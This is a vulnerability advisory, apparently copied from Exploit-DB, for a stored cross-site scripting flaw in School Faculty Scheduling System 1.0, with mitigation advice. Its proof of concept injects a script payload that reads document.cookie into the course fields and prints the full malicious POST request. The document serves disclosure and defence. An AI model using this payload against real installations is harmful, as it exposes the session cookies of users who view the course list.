School Faculty Scheduling System 1.0 - Stored Cross Site Scripting

vendor:

School Faculty Scheduling System

by:

Jyotsna Adhana

8.8

CVSS

HIGH

Stored Cross Site Scripting

CWE

Product Name: School Faculty Scheduling System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:school_faculty_scheduling_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2020

School Faculty Scheduling System 1.0 – Stored Cross Site Scripting

A stored cross-site scripting vulnerability exists in the School Faculty Scheduling System 1.0, which allows an attacker to inject malicious JavaScript code into the application. This code is then executed in the browser of any user who visits the Course List section. The malicious code is injected via the Course and Description fields when creating a new course.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed.

Source

Exploit-DB raw data:

# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses

Step 2: use payload <script>alert(document.cookie)</script> in Course and Description field

Malicious Request

POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
Content-Length: 478
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="id"


-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="course"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="description"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793--

Step 3: Cookie will be reflected each time someone visits the Course List section.